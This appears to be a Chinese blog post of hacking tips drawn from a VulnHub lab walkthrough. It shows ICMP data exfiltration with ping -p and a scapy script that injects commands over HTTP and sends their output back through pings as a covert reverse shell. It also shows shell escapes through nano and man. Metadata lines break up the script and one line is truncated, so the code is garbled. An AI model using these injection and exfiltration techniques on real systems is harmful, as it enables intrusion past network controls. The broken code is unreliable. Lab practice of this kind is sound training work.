几个hack小技巧
ping
-p pattern You may specify up to 16 ``pad’’ bytes to fill out the packet you send. This is useful for diagnosing data-dependent problems in a network. For example, -p ff will cause the sent packet to be filled with all ones.
如果渗透到了一台机子却只能往外发ping怎么办? -p 就可以搞定了。
举个例子
ping -c 1 -p `echo -n hello | xxd -ps` anoth_server
然后在another_server上面通过tcpdump就可以接收到hello。
$ tcpdump -i vboxnet0 -A
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on vboxnet0, link-type EN10MB (Ethernet), capture size 262144 bytes
IP 192.168.56.102 > 192.168.56.1: ICMP echo request, id 17686, seq 1, length 64
E..T..@.@.H...8f..8...:zE......U....lohellohellohellohellohellohellohellohellohelloh
IP 192.168.56.1 > 192.168.56.102: ICMP echo reply, id 17686, seq 1, length 64
E..T.L....I...8...8f..BzE......U....lohellohellohellohellohellohellohellohellohelloh
这有什么用呢?当然是反弹shell啦~
下面这个脚本是通过发送http请求,让目标主机给本机发送带有执行命令信息的ICMP数据包,从而达到类似反弹shell的结果:
from scapy.all import *
from threading import Thread
from requests import post
date: 2015-12-05
title: 几个hack小技巧
def pingListen():
pkts = sniff(iface="vboxnet0", timeout=1)
for packet in pkts:
if packet.getlayer(ICMP):
if str(packet.getlayer(ICMP).type) == "8":
sys.stdout.write(packet.getlayer(Raw).load[-1])
if __name__ == "__main__":
while True:
try:
sys.stdout.write('# ')
command = sys.stdin.readline().strip()
thread = Thread(target=pingListen)
thread.start()
payload = "; TEST=$(%s 2>&1 | xxd -c 1 -ps); for TEST2 in $TEST; do ping -c 1 -p $TEST2 192.168.56.1; done"%command
r = post
date: 2015-12-05
title: 几个hack小技巧
thread.join()
except KeyboardInterrupt:
break
nano执行命令
之前好像说过man可以执行命令:man -P ‘commands’ ls
其实nano也有“解释器”,不过这个“解释器”是一个spell checker,检查拼写错误的。
nano -s /bin/sh
然后再里面输入 /bin/bash ,按下 Ctl + T ,你就可以的到一个真正的bash了。
里面也可以输入别的命令让sh执行。
最后的最后
以上信息的来源:https://research.g0blin.co.uk/persistence-vulnhub-writeup/
可以玩一下这个盒子,后面都是逆向的内容了。